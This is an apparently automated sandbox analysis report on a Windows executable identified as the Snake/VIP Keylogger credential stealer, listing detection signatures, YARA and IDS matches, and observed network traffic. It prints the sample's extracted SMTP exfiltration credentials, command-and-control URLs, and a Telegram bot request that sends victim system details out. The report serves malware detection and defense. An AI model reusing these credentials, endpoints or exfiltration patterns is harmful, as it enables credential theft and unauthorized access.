Windows Analysis Report
Lpjrd6Wxad.exe

Overview

General Information

Sample name: Lpjrd6Wxad.exe (renamed because original name is a hash value)
Original sample name: 51f52b4829b1930c3d4781e63ac08ccb74840c9b901b46b9f35274803e6d5571.exe
Analysis ID: 1551190
MD5: 2ba023727b7a6399471d26a38f26695a
SHA1: 69d719ca185d62a737a2503a45b1b04cd097e190
SHA256: 51f52b4829b1930c3d4781e63ac08ccb74840c9b901b46b9f35274803e6d5571
Tags: exe, user-adrian__luca

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Lpjrd6Wxad.exe (PID: 3648 cmdline: "C:\Users\user\Desktop\Lpjrd6Wxad.exe" MD5: 2BA023727B7A6399471D26A38F26695A)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "sesilebruce@elemacuae.com", "Password": "(lqKKXb5", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "sesilebruce@elemacuae.com", "Password": "(lqKKXb5", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
Lpjrd6Wxad.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Lpjrd6Wxad.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
Lpjrd6Wxad.exe | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
Lpjrd6Wxad.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
Lpjrd6Wxad.exe | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2d5cb:$a1: get_encryptedPassword
  • 0x2d8d8:$a2: get_encryptedUsername
  • 0x2d3e9:$a3: get_timePasswordChanged
  • 0x2d4e4:$a4: get_passwordField
  • 0x2d5e1:$a5: set_encryptedPassword
  • 0x2ec72:$a7: get_logins
  • 0x2ebd5:$a10: KeyLoggerEventArgs
  • 0x2e83a:$a11: KeyLoggerEventArgsEventHandler

Source | Rule | Description | Author | Strings
00000000.00000002.4035317693.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2d3cb:$a1: get_encryptedPassword
  • 0x2d6d8:$a2: get_encryptedUsername
  • 0x2d1e9:$a3: get_timePasswordChanged
  • 0x2d2e4:$a4: get_passwordField
  • 0x2d3e1:$a5: set_encryptedPassword
  • 0x2ea72:$a7: get_logins
  • 0x2e9d5:$a10: KeyLoggerEventArgs
  • 0x2e63a:$a11: KeyLoggerEventArgsEventHandler

Source | Rule | Description | Author | Strings
0.0.Lpjrd6Wxad.exe.850000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.0.Lpjrd6Wxad.exe.850000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0.0.Lpjrd6Wxad.exe.850000.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
0.0.Lpjrd6Wxad.exe.850000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
0.0.Lpjrd6Wxad.exe.850000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2d5cb:$a1: get_encryptedPassword
  • 0x2d8d8:$a2: get_encryptedUsername
  • 0x2d3e9:$a3: get_timePasswordChanged
  • 0x2d4e4:$a4: get_passwordField
  • 0x2d5e1:$a5: set_encryptedPassword
  • 0x2ec72:$a7: get_logins
  • 0x2ebd5:$a10: KeyLoggerEventArgs
  • 0x2e83a:$a11: KeyLoggerEventArgsEventHandler

System Summary

Source: Network Connection | Author: frack113 | Data: DestinationIp: 208.91.198.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Lpjrd6Wxad.exe, Initiated: true, ProcessId: 3648, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49728

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-07T15:19:43.784767+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.8 | 49714 | TCP
2024-11-07T15:20:22.004076+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.8 | 49729 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-07T15:19:33.661061+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49708 | 188.114.96.3 | 443 | TCP
2024-11-07T15:19:43.626300+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49717 | 188.114.96.3 | 443 | TCP
2024-11-07T15:19:46.123464+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49722 | 188.114.96.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-07T15:19:30.556068+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49706 | 193.122.130.0 | 80 | TCP
2024-11-07T15:19:32.931122+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49706 | 193.122.130.0 | 80 | TCP
2024-11-07T15:19:35.790706+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49709 | 193.122.130.0 | 80 | TCP

                          AV Detection

Source: Lpjrd6Wxad.exe | Avira: detected
Source: 00000000.00000002.4035317693.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sesilebruce@elemacuae.com", "Password": "(lqKKXb5", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sesilebruce@elemacuae.com", "Password": "(lqKKXb5", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source: Lpjrd6Wxad.exe | ReversingLabs: Detection: 68%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Lpjrd6Wxad.exe | Joe Sandbox ML: detected

                          Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Lpjrd6Wxad.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49707 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: Lpjrd6Wxad.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 0_2_0102F4D0
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 0_2_0102FB03
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 0_2_0102FCE3
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 0582D829h | 0_2_0582D580
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 0582CF79h | 0_2_0582CCD0
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 0582C6C9h | 0_2_0582C420
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 0582F239h | 0_2_0582EF90
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 05822131h | 0_2_05821E80
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 0582E989h | 0_2_0582E6E0
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 058226F8h | 0_2_05822626
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 0582E0D9h | 0_2_0582DE30
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 0582DC81h | 0_2_0582D9D8
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 0582D3D1h | 0_2_0582D128
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 0582021Dh | 0_2_05820040
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 05820BA7h | 0_2_05820040
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 0582FAE9h | 0_2_0582F840
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 0582CB21h | 0_2_0582C878
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 0582F691h | 0_2_0582F3E8
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 0582EDE1h | 0_2_0582EB38
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 0582E531h | 0_2_0582E288
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 058226F8h | 0_2_058222D6
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 4x nop then jmp 058226F8h | 0_2_058222E0

                          Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: Lpjrd6Wxad.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.8:49728 -> 208.91.198.143:587
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2008/11/2024%20/%2006:12:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.91.198.143
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49709 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49706 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49722 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49717 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:49729
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.8:49714
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49708 -> 188.114.96.3:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: us2.smtp.mailhostbox.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 07 Nov 2024 14:19:52 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Lpjrd6Wxad.exe | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Lpjrd6Wxad.exe | String found in binary or memory: http://aborters.duckdns.org:8081
Source: Lpjrd6Wxad.exe | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: Lpjrd6Wxad.exe | String found in binary or memory: http://checkip.dyndns.org/q
Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: Lpjrd6Wxad.exe | String found in binary or memory: http://varders.kozow.com:8081
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: Lpjrd6Wxad.exe | String found in binary or memory: https://api.telegram.org/bot
Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20a
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002E82000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002E8C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002D1F000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002D8F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: Lpjrd6Wxad.exe | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002D8F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.79
Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002D8F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.79$
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002EBD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724

                          System Summary

Source: Lpjrd6Wxad.exe, type: SAMPLE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Lpjrd6Wxad.exe, type: SAMPLE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: Lpjrd6Wxad.exe, type: SAMPLE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Lpjrd6Wxad.exe PID: 3648, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0102C147
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0102D2C8
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0102D599
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0102C46F
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0102C738
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_010269A0
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0102CD28
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0102EC18
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_01026FC8
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0102CFF7
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_01023E12
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_01025370
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0102F4C7
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0102F4D0
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_010239CD
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0102EC0A
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_058247A8
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_058293F0
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_05828AA8
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582D580
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582D571
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582FC98
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_05828CC8
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582CCD0
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582C420
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582EF83
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_05821788
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582EF90
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_05821798
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_0582479C
Source: C:\Users\user\Desktop\Lpjrd6Wxad.exe | Code function: 0_2_05821E80
